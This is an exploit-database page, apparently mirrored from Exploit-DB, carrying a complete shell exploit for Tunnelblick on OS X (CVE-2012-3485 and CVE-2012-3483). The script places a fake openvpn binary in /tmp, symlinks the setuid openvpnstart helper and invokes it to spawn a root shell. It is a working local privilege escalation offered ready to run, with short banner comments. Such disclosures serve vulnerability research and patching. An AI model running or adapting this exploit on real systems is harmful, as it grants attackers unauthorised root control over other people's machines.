[] NeoSense
E X P L O I T S
title author type platform port cve id

Tunnelblick - Local Privilege Escalation (2)

Author: zx2c4
type: local
platform: osx
port: 
date_added: 2012-08-11 
date_updated: 2012-08-11 
verified: 1 
codes: CVE-2012-3485;OSVDB-84706;CVE-2012-3483;OSVDB-84704 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comTunnelblick_3.3beta18.dmg
#!/bin/sh

#### Pwnnel Blicker ####
#       for kids       #
#                      #
#         zx2c4        #
#                      #
########################

# This is another exploit for Tunnel Blick.
# Other exploits for Tunnel Blick are available here:
#      http://git.zx2c4.com/Pwnnel-Blicker/tree/



echo "[+] Making vulnerable directory."
mkdir -pv /tmp/pwn/openvpn/openvpn-0

echo "[+] Preparing payload."
cat > /tmp/pwn/openvpn/openvpn-0/openvpn <<_EOF
#!/bin/sh
echo "[+] Cleaning up."
rm -rfv /tmp/pwn
echo "[+] Getting root."
exec bash
_EOF
chmod -v +x /tmp/pwn/openvpn/openvpn-0/openvpn

echo "[+] Creating symlink."
ln -s -v -f /Applications/Tunnelblick.app/Contents/Resources/openvpnstart /tmp/pwn/start

echo "[+] Triggering vulnerable program."
exec /tmp/pwn/start OpenVPNInfo 0
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.